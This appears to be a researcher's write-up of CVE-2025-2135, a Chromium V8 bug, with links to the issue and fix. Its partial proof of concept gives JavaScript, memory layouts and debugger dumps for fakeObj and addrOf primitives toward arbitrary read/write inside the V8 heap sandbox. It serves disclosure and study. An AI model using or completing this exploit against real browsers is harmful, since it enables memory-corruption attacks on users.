# CVE-2025-2135

**Reporters: Zhenghang Xiao (@Kipreyyy) and Nan Wang (@eternalsakura13)** 

[Signal SIGTRAP in v8 [400052777] - Chromium](https://issues.chromium.org/issues/400052777)

[https://chromium.googlesource.com/v8/v8/+/8b490a9690b859346a68a3d2a7008b4e1852c3ea](https://chromium.googlesource.com/v8/v8/+/8b490a9690b859346a68a3d2a7008b4e1852c3ea)


### POC for Arbitrary Address Read/Write inside the V8 Heap Sandbox
- Check the `JSNativeContextSpecialization` and `JSCallReducer` in `TFInlining` phase ([V8 Turbofan InliningPhase](https://zhuanlan.zhihu.com/p/512262258))
- Faking Object using Huge Array: [3rd Real World CTF:Exploiting V8 Interpreter by -1 Index to Descriptor Array](https://www.youtube.com/watch?v=rSaIlBWwxsY)

```
offset first_huge_arr.elements = x = 0x02340010  (untagged)
offset second_huge_arr.elements = y = 0x06580010  (untagged) //
```

```
// Step 1: setup fake_arr
offset 0x02340010=x    :  // <---- first_huge_arr.elements
offset          x+8    :<Map>=0x189a41     --    <Property>=0x745 //8 bytes <-- fake_arr
offset          x+0x10 :<Element>=0x745    --    <Length>=0x1337<<1 // 8 bytes



// Step 2: create fakeObj primitive
function f1(v2, v3) {

    var v4 = v3[0]; // HOLEY_DOUBLE_ELEMENTS
    var v5 = v2[0]; // HOLEY_DOUBLE_ELEMENTS -> HOLEY_ELEMENTS

    Array.prototype.push.call(v3, 2.199998872005392); // 0x40019999`02340019 <-- offset of fake_arr: x+8+1 (tagged)

}
```


```javascript
// ...
// ...
let  arr  =  new  Array(1);

arr[0] =  1.1;

//%DebugPrint(arr);

f1(arr, arr);

// dumping of v3
// 0:025> dd 000002670040B421-1
// 00000267`0040b420   000008a1  00000026 0040b415 00000515
// 00000267`0040b430  |02340019| 40019999 fff7ffff fff7ffff  // <-- our float is at offset 0x40b430
```

We can create `fake_arr`: after push, the current length of `v3` is 2 (if you try to access index 2 -> `undefined`) so you need to extend the length of `JSArray` - just simply set `v3[11] = 11.11`
Because the length of `FixedDoubleArray` is ?? ( i dont remember)
After do all these things -> `return v3[2]` -> `fake_arr`
```
/* fake_arr
DebugPrint: 0000033302340019: [JSArray]
- map: 0x033300189a41 <Map[16](PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x0333001893ad <JSArray[0]>
- elements: 0x033300000745 <FixedArray[0]> [PACKED_DOUBLE_ELEMENTS]
- length: 4919 // 0x1337
*/
```

```
// Step 2: Setup addrOf
offset 0x02340010=x    :  // <---- first_huge_arr.elements
offset          x+8    :<Map>=0x189a41     --    <Property>=0x745 //8 bytes <-- fake_arr
offset          x+0x10 :<Element>=0x745    --    <Length>=0x1337<<1 // 8 bytes
...
offset 0x006580010=y   :  // <---- second_huge_arr.elements
offset           y+8   :offset victim obj // 4 bytes

|
| // Change the fake_arr.elements using first_huge_arr
v
offset 0x02340010=x    :  // <---- first_huge_arr.elements
offset          x+8    :<Map>=0x189a41  --    <Property>=0x745 //8 bytes <-- fake_arr
offset          x+0x10 :<Element>=y+1   --    <Length>=0x1337<<1 // 8 bytes
...
offset 0x006580010=y   :  // <---- second_huge_arr.elements
offset           y+8   :offset victim obj // 4 bytes
```

```
// Step 3: Arbitrary Address Read/Write
Change the fake_elements.elements using first_huge_arr
```
